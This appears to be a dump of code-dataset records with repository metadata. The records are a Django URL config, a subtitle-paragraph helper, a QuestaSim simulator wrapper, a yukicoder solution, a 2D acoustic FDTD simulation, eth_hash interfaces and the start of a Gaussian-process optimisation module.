from django.urls import path, include from . import views urlpatterns = [ path('', views.index, name='index'), path('populated_cities', views.populated_cities_query, name ='populated_cities'), path('start_tour_cities', views.start_tour_cities, name ='start_tour_cities'), path('stop_tour_cities', views.stop_tour_cities, name ='stop_tour_cities'), path('premierLeague_stadiums', views.premierLeague_stadiums_query, name ='premierLeague_stadiums'), path('start_tour_stadiums', views.start_tour_stadiums, name ='start_tour_stadiums'), path('stop_tour_stadiums', views.stop_tour_stadiums, name ='stop_tour_stadiums'), path('longest_rivers', views.longest_rivers_query, name ='longest_rivers'), path('tour_experience', views.tour_experience, name ='tour_experience'), path('line_track_experience', views.line_track_experience, name ='line_track_experience'), path('stop_experience', views.stop_experience, name ='stop_experience'), path('spanish_airports', views.spanish_airports_query, name ='spanish_airports'), path('start_tour_airports', views.start_tour_airports, name ='start_tour_airports'), path('stop_tour_airports', views.stop_tour_airports, name ='stop_tour_airports'), path('summer_olympic_games_aux', views.olympic_games_query_aux, name ='summer_olympic_games_aux'), path('summer_olympic_games', views.olympic_games_query, name ='summer_olympic_games'), path('try_demo', views.try_demo, name ='try_demo'), path('start_lleida_tour', views.start_lleida_tour, name ='start_lleida_tour'), path('start_bayern_tour', views.start_bayern_tour, name ='start_bayern_tour'), path('start_barcelona92', views.start_barcelona92, name ='start_barcelona92'), path('stop_tour_demo', views.stop_tour_demo, name ='stop_tour_demo'), path('clear_KML_folder', views.clear_KML_folder, name ='clear_KML_folder'), path('stop_current_tour', views.stop_current_tour, name ='stop_current_tour'), path('relaunch_LG', views.relaunch_LG, name ='relaunch_LG'), path('clear_LG_cache', views.clear_LG_cache, name 
='clear_LG_cache') ]
0
0
0
c91cf546e259967fe077b3bc9f5679adb51c38a3
1,130
py
Python
ParagraphRefact.py
willard1218/LearnEnglish
c9a908ffdff097b2c819540a9a2a761c91c1eead
[ "Apache-2.0" ]
null
null
null
ParagraphRefact.py
willard1218/LearnEnglish
c9a908ffdff097b2c819540a9a2a761c91c1eead
[ "Apache-2.0" ]
null
null
null
ParagraphRefact.py
willard1218/LearnEnglish
c9a908ffdff097b2c819540a9a2a761c91c1eead
[ "Apache-2.0" ]
null
null
null
import Enum RF = Enum.enum(ORIGINAL=0, PIECE=1, EN_LINE1=2, EN_LINE2=3)
28.974359
72
0.69646
import Enum RF = Enum.enum(ORIGINAL=0, PIECE=1, EN_LINE1=2, EN_LINE2=3) def refactWithLine(talk, countOfLine): count = 0 talk.ResetStartOfParagraph(False) subtitle = talk.subtitles subtitle[0].startOfParagraph = True for i in xrange(1,len(subtitle)): if(subtitle[i].content[-1] == "." or subtitle[i].content[-1] == "?"): count = count + 1 if(i < len(subtitle)-1 and count == countOfLine): subtitle[i+1].startOfParagraph = True count = 0 def methodOriginal(enTalk, chTalk): return def methodPIECE(enTalk, chTalk): chTalk.ResetStartOfParagraph(True) enTalk.ResetStartOfParagraph(True) def methodEN_LINE1(enTalk, chTalk): chTalk.ResetStartOfParagraph(True) refactWithLine(enTalk, 1) def methodEN_LINE2(enTalk, chTalk): chTalk.ResetStartOfParagraph(True) refactWithLine(enTalk, 2) def RefactStartOfParagraph(enTalk, chTalk, refactType = RF.ORIGINAL): doMethod = { RF.ORIGINAL : methodOriginal, RF.PIECE : methodPIECE, RF.EN_LINE1 : methodEN_LINE1, RF.EN_LINE2 : methodEN_LINE2, } doMethod[int(refactType)](enTalk, chTalk)
899
0
158
793d195c49c731b9089c998b075845197f2a39b1
13,520
py
Python
py/Simulator/QuestaSimulator.py
cjchin/PoC
dbb07f85648dc4d5e66696699071750fcc08c8f7
[ "Apache-2.0" ]
2
2018-03-17T18:14:52.000Z
2021-05-02T06:47:16.000Z
py/Simulator/QuestaSimulator.py
cjchin/PoC
dbb07f85648dc4d5e66696699071750fcc08c8f7
[ "Apache-2.0" ]
null
null
null
py/Simulator/QuestaSimulator.py
cjchin/PoC
dbb07f85648dc4d5e66696699071750fcc08c8f7
[ "Apache-2.0" ]
1
2021-05-02T06:47:19.000Z
2021-05-02T06:47:19.000Z
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*- # vim: tabstop=2:shiftwidth=2:noexpandtab # kate: tab-width 2; replace-tabs off; indent-width 2; # # ============================================================================== # Authors: Patrick Lehmann # Martin Zabel # # Python Module: Mentor QuestaSim simulator. # # License: # ============================================================================== # Copyright 2007-2016 Technische Universitaet Dresden - Germany # Chair of VLSI-Design, Diagnostics and Architecture # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # # load dependencies from pathlib import Path from textwrap import dedent from Base.Project import FileTypes, ToolChain, Tool from DataBase.Config import Vendors from ToolChains.Mentor.QuestaSim import QuestaSim, QuestaSimException from Simulator import VHDL_TESTBENCH_LIBRARY_NAME, SimulatorException, SkipableSimulatorException, SimulationSteps, Simulator as BaseSimulator __api__ = [ 'Simulator' ] __all__ = __api__
46.30137
161
0.723817
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*- # vim: tabstop=2:shiftwidth=2:noexpandtab # kate: tab-width 2; replace-tabs off; indent-width 2; # # ============================================================================== # Authors: Patrick Lehmann # Martin Zabel # # Python Module: Mentor QuestaSim simulator. # # License: # ============================================================================== # Copyright 2007-2016 Technische Universitaet Dresden - Germany # Chair of VLSI-Design, Diagnostics and Architecture # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
# ============================================================================== # # load dependencies from pathlib import Path from textwrap import dedent from Base.Project import FileTypes, ToolChain, Tool from DataBase.Config import Vendors from ToolChains.Mentor.QuestaSim import QuestaSim, QuestaSimException from Simulator import VHDL_TESTBENCH_LIBRARY_NAME, SimulatorException, SkipableSimulatorException, SimulationSteps, Simulator as BaseSimulator __api__ = [ 'Simulator' ] __all__ = __api__ class Simulator(BaseSimulator): TOOL_CHAIN = ToolChain.Mentor_QuestaSim TOOL = Tool.Mentor_vSim def __init__(self, host, dryRun, simulationSteps): # A separate elaboration step is not implemented in QuestaSim simulationSteps &= ~SimulationSteps.Elaborate super().__init__(host, dryRun, simulationSteps) vSimSimulatorFiles = host.PoCConfig['CONFIG.DirectoryNames']['QuestaSimFiles'] self.Directories.Working = host.Directories.Temp / vSimSimulatorFiles self.Directories.PreCompiled = host.Directories.PreCompiled / vSimSimulatorFiles if (SimulationSteps.CleanUpBefore in self._simulationSteps): pass if (SimulationSteps.Prepare in self._simulationSteps): self._PrepareSimulationEnvironment() self._PrepareSimulator() def _PrepareSimulator(self): # create the QuestaSim executable factory self.LogVerbose("Preparing Mentor simulator.") # for sectionName in ['INSTALL.Mentor.QuestaSim', 'INSTALL.Mentor.ModelSim', 'INSTALL.Altera.ModelSim']: # if (len(self.Host.PoCConfig.options(sectionName)) != 0): # break # else: # XXX: check SectionName if ModelSim is configured # raise NotConfiguredException( # "Neither Mentor Graphics QuestaSim, ModelSim PE nor ModelSim Altera-Edition are configured on this system.") # questaSection = self.Host.PoCConfig[sectionName] # binaryPath = Path(questaSection['BinaryDirectory']) # version = questaSection['Version'] binaryPath = Path(self.Host.PoCConfig['INSTALL.ModelSim']['BinaryDirectory']) version = self.Host.PoCConfig['INSTALL.ModelSim']['Version'] 
self._toolChain = QuestaSim(self.Host.Platform, self.DryRun, binaryPath, version, logger=self.Logger) def Run(self, testbench, board, vhdlVersion, vhdlGenerics=None): # TODO: refactor into a ModelSim module, shared by QuestaSim and Cocotb (-> MixIn class)? # select modelsim.ini self._modelsimIniPath = self.Directories.PreCompiled if board.Device.Vendor is Vendors.Altera: self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['AlteraSpecificFiles'] elif board.Device.Vendor is Vendors.Lattice: self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['LatticeSpecificFiles'] elif board.Device.Vendor is Vendors.Xilinx: self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['XilinxSpecificFiles'] self._modelsimIniPath /= "modelsim.ini" if not self._modelsimIniPath.exists(): raise SimulatorException("Modelsim ini file '{0!s}' not found.".format(self._modelsimIniPath)) \ from FileNotFoundError(str(self._modelsimIniPath)) super().Run(testbench, board, vhdlVersion, vhdlGenerics) def _RunAnalysis(self, _): # create a QuestaVHDLCompiler instance vlib = self._toolChain.GetVHDLLibraryTool() for lib in self._pocProject.VHDLLibraries: vlib.Parameters[vlib.SwitchLibraryName] = lib.Name vlib.CreateLibrary() # create a QuestaVHDLCompiler instance vcom = self._toolChain.GetVHDLCompiler() vcom.Parameters[vcom.FlagQuietMode] = True vcom.Parameters[vcom.FlagExplicit] = True vcom.Parameters[vcom.FlagRangeCheck] = True vcom.Parameters[vcom.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix() vcom.Parameters[vcom.SwitchVHDLVersion] = repr(self._vhdlVersion) recompileScriptContent = dedent("""\ puts "Recompiling..." 
""") # run vcom compile for each VHDL file for file in self._pocProject.Files(fileType=FileTypes.VHDLSourceFile): if (not file.Path.exists()): raise SimulatorException("Cannot analyse '{0!s}'.".format(file.Path)) from FileNotFoundError(str(file.Path)) vcomLogFile = self.Directories.Working / (file.Path.stem + ".vcom.log") vcom.Parameters[vcom.SwitchVHDLLibrary] = file.LibraryName vcom.Parameters[vcom.ArgLogFile] = vcomLogFile vcom.Parameters[vcom.ArgSourceFile] = file.Path try: vcom.Compile() except QuestaSimException as ex: raise SimulatorException("Error while compiling '{0!s}'.".format(file.Path)) from ex if vcom.HasErrors: raise SkipableSimulatorException("Error while compiling '{0!s}'.".format(file.Path)) # delete empty log files if (vcomLogFile.stat().st_size == 0): try: vcomLogFile.unlink() except OSError as ex: raise SimulatorException("Error while deleting '{0!s}'.".format(vcomLogFile)) from ex # collecting all compile commands in a buffer recompileScriptContent += dedent("""\ puts " Compiling '{file}'..." {tcl} """).format( file=file.Path.as_posix(), tcl=vcom.GetTclCommand() ) recompileScriptContent += dedent("""\ puts "Recompilation done" puts "Restarting simulation..." restart -force puts "Simulation is restarted." """) recompileScriptContent = recompileScriptContent.replace("\\", "/") # WORKAROUND: to convert all paths to Tcl compatible paths. 
recompileScriptPath = self.Directories.Working / "recompile.do" self.LogDebug("Writing recompile script to '{0!s}'".format(recompileScriptPath)) with recompileScriptPath.open('w') as fileHandle: fileHandle.write(recompileScriptContent) def _RunSimulation(self, testbench): if (SimulationSteps.ShowWaveform in self._simulationSteps): return self._RunSimulationWithGUI(testbench) tclBatchFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimBatchScript'] tclDefaultBatchFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultBatchScript'] # create a QuestaSimulator instance vsim = self._toolChain.GetSimulator() vsim.Parameters[vsim.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix() # vsim.Parameters[vsim.FlagOptimization] = True # FIXME: vsim.Parameters[vsim.FlagReportAsError] = "3473" vsim.Parameters[vsim.SwitchTimeResolution] = "1fs" vsim.Parameters[vsim.FlagCommandLineMode] = True vsim.Parameters[vsim.SwitchTopLevel] = "{0}.{1}".format(VHDL_TESTBENCH_LIBRARY_NAME, testbench.ModuleName) # find a Tcl batch script for the BATCH mode vsimBatchCommand = "" if (tclBatchFilePath.exists()): self.LogDebug("Found Tcl script for BATCH mode: '{0!s}'".format(tclBatchFilePath)) vsimBatchCommand += "do {0};".format(tclBatchFilePath.as_posix()) elif (tclDefaultBatchFilePath.exists()): self.LogDebug("Falling back to default Tcl script for BATCH mode: '{0!s}'".format(tclDefaultBatchFilePath)) vsimBatchCommand += "do {0};".format(tclDefaultBatchFilePath.as_posix()) else: raise QuestaSimException("No Tcl batch script for BATCH mode found.") \ from FileNotFoundError(str(tclDefaultBatchFilePath)) vsim.Parameters[vsim.SwitchBatchCommand] = vsimBatchCommand testbench.Result = vsim.Simulate() def _RunSimulationWithGUI(self, testbench): tclGUIFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimGUIScript'] tclWaveFilePath = self.Host.Directories.Root / 
self.Host.PoCConfig[testbench.ConfigSectionName]['vSimWaveScript'] tclDefaultGUIFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultGUIScript'] tclDefaultWaveFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultWaveScript'] # create a QuestaSimulator instance vsim = self._toolChain.GetSimulator() vsim.Parameters[vsim.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix() # vsim.Parameters[vsim.FlagOptimization] = True # FIXME: vsim.Parameters[vsim.FlagReportAsError] = "3473" vsim.Parameters[vsim.SwitchTimeResolution] = "1fs" vsim.Parameters[vsim.FlagGuiMode] = True vsim.Parameters[vsim.SwitchTopLevel] = "{0}.{1}".format(VHDL_TESTBENCH_LIBRARY_NAME, testbench.ModuleName) # vsim.Parameters[vsim.SwitchTitle] = testbenchName vsimDefaultWaveCommands = "add wave *" # find a Tcl batch script to load predefined signals in the waveform window vsimBatchCommand = "" self.LogDebug("'{0!s}'\n '{1!s}'".format(tclWaveFilePath, self.Host.Directories.Root)) if (tclWaveFilePath != self.Host.Directories.Root): if (tclWaveFilePath.exists()): self.LogDebug("Found waveform script: '{0!s}'".format(tclWaveFilePath)) vsimBatchCommand = "do {0};".format(tclWaveFilePath.as_posix()) elif (tclDefaultWaveFilePath != self.Host.Directories.Root): if (tclDefaultWaveFilePath.exists()): self.LogDebug("Found default waveform script: '{0!s}'".format(tclDefaultWaveFilePath)) vsimBatchCommand = "do {0};".format(tclDefaultWaveFilePath.as_posix()) else: self.LogDebug("Couldn't find default waveform script: '{0!s}'. Loading default command '{1}'.".format(tclDefaultWaveFilePath, vsimDefaultWaveCommands)) vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands) else: self.LogDebug("Couldn't find waveform script: '{0!s}'. 
Loading default command '{1}'.".format(tclWaveFilePath, vsimDefaultWaveCommands)) vsim.Parameters[vsim.SwitchBatchCommand] = "{0};".format(vsimDefaultWaveCommands) elif (tclDefaultWaveFilePath != self.Host.Directories.Root): if (tclDefaultWaveFilePath.exists()): self.LogDebug("Falling back to default waveform script: '{0!s}'".format(tclDefaultWaveFilePath)) vsimBatchCommand = "do {0};".format(tclDefaultWaveFilePath.as_posix()) else: self.LogDebug("Couldn't find default waveform script: '{0!s}'. Loading default command '{1}'.".format(tclDefaultWaveFilePath, vsimDefaultWaveCommands)) vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands) else: self.LogWarning("No waveform script specified. Loading default command '{1}'.".format(vsimDefaultWaveCommands)) vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands) # find a Tcl batch script for the GUI mode vsimRunScript = "" if (tclGUIFilePath.exists()): self.LogDebug("Found Tcl script for GUI mode: '{0!s}'".format(tclGUIFilePath)) vsimRunScript = tclGUIFilePath.as_posix() vsimBatchCommand += "do {0};".format(vsimRunScript) elif (tclDefaultGUIFilePath.exists()): self.LogDebug("Falling back to default Tcl script for GUI mode: '{0!s}'".format(tclDefaultGUIFilePath)) vsimRunScript = tclDefaultGUIFilePath.as_posix() vsimBatchCommand += "do {0};".format(vsimRunScript) else: raise QuestaSimException("No Tcl batch script for GUI mode found.") \ from FileNotFoundError(str(tclDefaultGUIFilePath)) vsim.Parameters[vsim.SwitchBatchCommand] = vsimBatchCommand # writing a relaunch file recompileScriptPath = self.Directories.Working / "recompile.do" relaunchScriptPath = self.Directories.Working / "relaunch.do" saveWaveformScriptPath = self.Directories.Working / "saveWaveform.do" relaunchScriptContent = dedent("""\ puts "Loading recompile script '{recompileScript}'..." do {recompileScript} puts "Loading run script '{runScript}'..." 
do {runScript} """).format( recompileScript=recompileScriptPath.as_posix(), runScript=vsimRunScript ) self.LogDebug("Writing relaunch script to '{0!s}'".format(relaunchScriptPath)) with relaunchScriptPath.open('w') as fileHandle: fileHandle.write(relaunchScriptContent) # writing a saveWaveform file saveWaveformScriptContent = dedent("""\ puts "Saving waveform settings to '{waveformFile}'..." write format wave -window .main_pane.wave.interior.cs.body.pw.wf {waveformFile} """).format( waveformFile=tclWaveFilePath.as_posix() ) self.LogDebug("Writing saveWaveform script to '{0!s}'".format(saveWaveformScriptPath)) with saveWaveformScriptPath.open('w') as fileHandle: fileHandle.write(saveWaveformScriptContent) testbench.Result = vsim.Simulate()
11,506
236
23
af19a1538ffdc439b60f50fdf727d12a925a93f3
128
py
Python
yc228/908.py
c-yan/yukicoder
cdbbd65402177225dd989df7fe01f67908484a69
[ "MIT" ]
null
null
null
yc228/908.py
c-yan/yukicoder
cdbbd65402177225dd989df7fe01f67908484a69
[ "MIT" ]
null
null
null
yc228/908.py
c-yan/yukicoder
cdbbd65402177225dd989df7fe01f67908484a69
[ "MIT" ]
null
null
null
S = input() if all(c == ' ' for c in S[1::2]) and all('a' <= c <= 'z' for c in S[::2]): print('Yes') else: print('No')
18.285714
75
0.445313
S = input() if all(c == ' ' for c in S[1::2]) and all('a' <= c <= 'z' for c in S[::2]): print('Yes') else: print('No')
0
0
0
7b6e6c533e62117ccdb9f1743db9f70ee1c32542
5,070
py
Python
2dacousti_fdtd.py
dhufe/2d_ftdt_acoustics
062ff13399cc3b9db360e047bd1deb7c0e209397
[ "MIT" ]
null
null
null
2dacousti_fdtd.py
dhufe/2d_ftdt_acoustics
062ff13399cc3b9db360e047bd1deb7c0e209397
[ "MIT" ]
null
null
null
2dacousti_fdtd.py
dhufe/2d_ftdt_acoustics
062ff13399cc3b9db360e047bd1deb7c0e209397
[ "MIT" ]
null
null
null
# # # # # import numpy as np import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import matplotlib.animation as animation ## Computing grid and resolutions # Grid size x-direction NX = 500 # Grid size y-direction NY = 500 ## Properties of the acoustic excitation # Frequency freq = 60.0e3 # Hz # wave speed cmax = 343 # m/s # wave length lamda = cmax / freq # Spatial resolution # spatial stability critria: dx must be smaller or equal than lambda_min / 20 # where lambda_min is the shortest wavelength in the model! dx = lamda/40 #.01 # Time domain resolution # time stability criteria: dt must be smaller or equal than dx / ( sqrt(2) * c_max ) # where c_max is the highest wave speed in the model! dt = dx/(cmax*np.sqrt(2) ) # 20.0e-6 # mesh grid x = np.arange ( 0, (NX)*dx, dx ) y = np.arange ( 0, (NY)*dx, dx ) xx, yy = np.meshgrid( y, x ) ## Properties of the fluid like density and viscosity # Density rho = 1.241 # Bulk viscosity: c^2 x rho kappa = np.power(cmax, 2.0) * rho #142.0e3 ## Computing magnitutes for two dimensional particle velocity and pressure Vx = np.zeros ( ( NX + 1, NY ) ) Vy = np.zeros ( ( NX , NY + 1 ) ) P = np.zeros ( ( NX , NY ) ) NFrames = 3000 SourceWidth = 20 SourceHeight = 10 # setup indices ind = np.full(( NX, NY), False, dtype=bool) # setup indices ind = np.full(( NX, NY), False, dtype=bool) Pmx = int(np.floor(NX/4 - 10 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(NX/2 - 10 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(3*NX/4 - 10 + 1 )) Pmy = int(np.floor( NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(NX - 30 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) # Pxs = int(np.floor(NX/2 - SourceWidth/2 + 1 )) # Pxe = int(np.floor(NX/2 + SourceWidth/2 + 1 )) # Pys = int(np.floor(NY/2 - SourceHeight/2 + 1 )) # Pye = int(np.floor(NY/2 + SourceHeight/2 + 1 )) # ind[ Pxs:Pxe, Pys:Pys ] = True ## Visual stuff # Colormap 
colormap = 'RdBu' # Plot creation fig = plt.figure(figsize=(12.8, 7.2)) ax = fig.add_subplot(1,1,1) cax = ax.pcolormesh( xx, yy, P, vmin=-1, vmax=1, cmap=colormap) ax.set_xlabel ( r'Position $x$ / $m$' ) ax.set_ylabel ( r'Position $y$ / $m$' ) ax.set_xlim ( y[0], y[-1] ) ax.set_ylim ( x[0], x[-1] ) fig.colorbar(cax) fig.tight_layout() image_step = 400 ## help variables dt_over_rho_x_dx = dt / ( rho * dx ) kappa_x_dt_over_dx = kappa * dt / dx print ( 'Spatial stepsize %00.3f mm.' % ( dx*1e3 ) ) print ( 'Time stepsize %00.3f us.' % ( dt*1e6 ) ) print ( 'Volume elasticity %03.3f .' % ( kappa*1e-3 ) ) print ( 'Pulse width %d ' % ( int((1.0/freq)/dt) ) ) n = 0 anim = animation.FuncAnimation(fig, updatefig, frames=NFrames-1,interval=image_step, blit=True) anim Writer = animation.writers['ffmpeg'] writer = Writer ( fps=100, metadata=dict(artist='dkotscha' ), bitrate=6000) anim.save('ftdt_acoustic_one_source_2d.mp4', writer=writer ) plt.close()
25.477387
99
0.559369
# # # # # import numpy as np import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import matplotlib.animation as animation def circle(indices, xm, ym, r): x = r - 1 y = 0 dx = 1 dy = 1 err = dx - (r * 2) while ( x >= y): indices [ xm + x , ym + y] = True indices [ xm + y , ym + x] = True indices [ xm - y , ym + x] = True indices [ xm - x , ym + y] = True indices [ xm - x , ym - y] = True indices [ xm - y , ym - x] = True indices [ xm + y , ym - x] = True indices [ xm + x , ym - y] = True if err <= 0: y+=1 err += dy dy += 2 if err > 0: x-=1 dy += 2 err += dx - ( 2*r ) ## Computing grid and resolutions # Grid size x-direction NX = 500 # Grid size y-direction NY = 500 ## Properties of the acoustic excitation # Frequency freq = 60.0e3 # Hz # wave speed cmax = 343 # m/s # wave length lamda = cmax / freq # Spatial resolution # spatial stability critria: dx must be smaller or equal than lambda_min / 20 # where lambda_min is the shortest wavelength in the model! dx = lamda/40 #.01 # Time domain resolution # time stability criteria: dt must be smaller or equal than dx / ( sqrt(2) * c_max ) # where c_max is the highest wave speed in the model! 
dt = dx/(cmax*np.sqrt(2) ) # 20.0e-6 # mesh grid x = np.arange ( 0, (NX)*dx, dx ) y = np.arange ( 0, (NY)*dx, dx ) xx, yy = np.meshgrid( y, x ) ## Properties of the fluid like density and viscosity # Density rho = 1.241 # Bulk viscosity: c^2 x rho kappa = np.power(cmax, 2.0) * rho #142.0e3 ## Computing magnitutes for two dimensional particle velocity and pressure Vx = np.zeros ( ( NX + 1, NY ) ) Vy = np.zeros ( ( NX , NY + 1 ) ) P = np.zeros ( ( NX , NY ) ) NFrames = 3000 SourceWidth = 20 SourceHeight = 10 # setup indices ind = np.full(( NX, NY), False, dtype=bool) # setup indices ind = np.full(( NX, NY), False, dtype=bool) Pmx = int(np.floor(NX/4 - 10 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(NX/2 - 10 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(3*NX/4 - 10 + 1 )) Pmy = int(np.floor( NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(NX - 30 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) # Pxs = int(np.floor(NX/2 - SourceWidth/2 + 1 )) # Pxe = int(np.floor(NX/2 + SourceWidth/2 + 1 )) # Pys = int(np.floor(NY/2 - SourceHeight/2 + 1 )) # Pye = int(np.floor(NY/2 + SourceHeight/2 + 1 )) # ind[ Pxs:Pxe, Pys:Pys ] = True ## Visual stuff # Colormap colormap = 'RdBu' # Plot creation fig = plt.figure(figsize=(12.8, 7.2)) ax = fig.add_subplot(1,1,1) cax = ax.pcolormesh( xx, yy, P, vmin=-1, vmax=1, cmap=colormap) ax.set_xlabel ( r'Position $x$ / $m$' ) ax.set_ylabel ( r'Position $y$ / $m$' ) ax.set_xlim ( y[0], y[-1] ) ax.set_ylim ( x[0], x[-1] ) fig.colorbar(cax) fig.tight_layout() image_step = 400 ## help variables dt_over_rho_x_dx = dt / ( rho * dx ) kappa_x_dt_over_dx = kappa * dt / dx print ( 'Spatial stepsize %00.3f mm.' % ( dx*1e3 ) ) print ( 'Time stepsize %00.3f us.' % ( dt*1e6 ) ) print ( 'Volume elasticity %03.3f .' 
% ( kappa*1e-3 ) ) print ( 'Pulse width %d ' % ( int((1.0/freq)/dt) ) ) n = 0 def updatefig (n): # Updating particle velocities for i in range (2,NX): for j in range ( 1, NY ): Vx[i,j] -= dt_over_rho_x_dx * ( P[i,j] - P[i-1,j] ) for i in range (1,NX): for j in range ( 2, NY): Vy[i,j] -= dt_over_rho_x_dx * ( P[i,j] - P[i,j-1] ) # Update sound pressure for i in range (1, NX): for j in range (1,NY): P[i,j] -= ( ( Vx[i+1,j] - Vx[i,j] ) + ( Vy[i,j+1] - Vy[i,j] ) ) # Acoustic source ( during one period) if (n < (1.0/freq)/dt): P[ ind ] += .33*(1.0-np.cos(2.0*np.pi*freq*n*dt))/2.0 * np.sin(2.0*np.pi*freq*n*dt) if (n < (1.0/(.5*freq))/dt): P[ ind ] += .33*(1.0-np.cos(2.0*np.pi*.5*freq*n*dt))/2.0 * np.sin(2.0*np.pi*.5*freq*n*dt) if (n < (1.0/(.25*freq))/dt): P[ ind ] += .33*(1.0-np.cos(2.0*np.pi*.25*freq*n*dt))/2.0 * np.sin(2.0*np.pi*.25*freq*n*dt) if (( n + 1 ) % 100 == 1) or ( n == 0): print ( '--- processing step %03d ---' % ( n )) # Updating the current calculation step n += 1 # Updating data cax.set_array ( P.flatten() ) #cax2.set_array ( np.abs(P).flatten() ) #ax.set_title("circular membrane: l={}, m={}-Mode".format(l+1,m)) ax.set_title("Time step {} ms".format( int((n*dt*1e3*10))/10.0 ) ) #ax[1].set_title("Time step {} ms".format( int((n*dt*1e3*10))/10.0 ) ) return cax, anim = animation.FuncAnimation(fig, updatefig, frames=NFrames-1,interval=image_step, blit=True) anim Writer = animation.writers['ffmpeg'] writer = Writer ( fps=100, metadata=dict(artist='dkotscha' ), bitrate=6000) anim.save('ftdt_acoustic_one_source_2d.mp4', writer=writer ) plt.close()
1,979
0
46
ddbe5d981cc7c179c7df3962dd94212f2262bf54
629
py
Python
MOnewUser/env/lib/python3.8/site-packages/eth_hash/abc.py
julio-cesar-leitao/PGP-PKI
9bdeb4606534d6dacba8356b223a20e204399d32
[ "MIT" ]
68
2018-02-08T20:46:16.000Z
2022-03-18T19:36:09.000Z
MOnewUser/env/lib/python3.8/site-packages/eth_hash/abc.py
julio-cesar-leitao/PGP-PKI
9bdeb4606534d6dacba8356b223a20e204399d32
[ "MIT" ]
21
2018-02-07T20:45:06.000Z
2021-09-24T19:57:52.000Z
MOnewUser/env/lib/python3.8/site-packages/eth_hash/abc.py
julio-cesar-leitao/PGP-PKI
9bdeb4606534d6dacba8356b223a20e204399d32
[ "MIT" ]
46
2018-02-08T15:15:40.000Z
2022-03-28T18:49:32.000Z
from abc import ( ABC, abstractmethod, ) from typing import ( Union, )
17.472222
72
0.583466
from abc import ( ABC, abstractmethod, ) from typing import ( Union, ) class PreImageAPI(ABC): @abstractmethod def __init__(self, value: bytes) -> None: ... @abstractmethod def update(self, value: bytes) -> None: ... @abstractmethod def digest(self) -> bytes: ... @abstractmethod def copy(self) -> 'PreImageAPI': ... class BackendAPI(ABC): @abstractmethod def keccak256(self, in_data: Union[bytearray, bytes]) -> bytes: ... @abstractmethod def preimage(self, in_data: Union[bytearray, bytes]) -> PreImageAPI: ...
215
283
46
ef3d6bc838bd24e2609fe5471781cac8f97d2759
12,070
py
Python
GP_model.py
JixiangChen-Jimmy/DMEA
886ca864fa6b2f51867688035870f1ec344d1090
[ "MIT" ]
null
null
null
GP_model.py
JixiangChen-Jimmy/DMEA
886ca864fa6b2f51867688035870f1ec344d1090
[ "MIT" ]
null
null
null
GP_model.py
JixiangChen-Jimmy/DMEA
886ca864fa6b2f51867688035870f1ec344d1090
[ "MIT" ]
null
null
null
import GPy from GPyOpt.util.general import get_quantiles import GPyOpt import numpy as np from math import pow, log, sqrt import pandas as pd # train_x : history x # train_y : history y # num_init : The number of initial sample points # lsx : the collected x in last round # lsy : the text function value corresponding to the collected x in last round # P : Represents the historical confidence level of the acquisition functions in acquisition library # domain : refer to the information of the variable of BayesianOptimization called by GPyOpt # f : refer to the optimization objectives information of BayesianOptimization called by GPyOpt # num_obj : The selected number of acquisition functions that build up multi-objective optimization. # eta is a hyperparameters
43.731884
121
0.505965
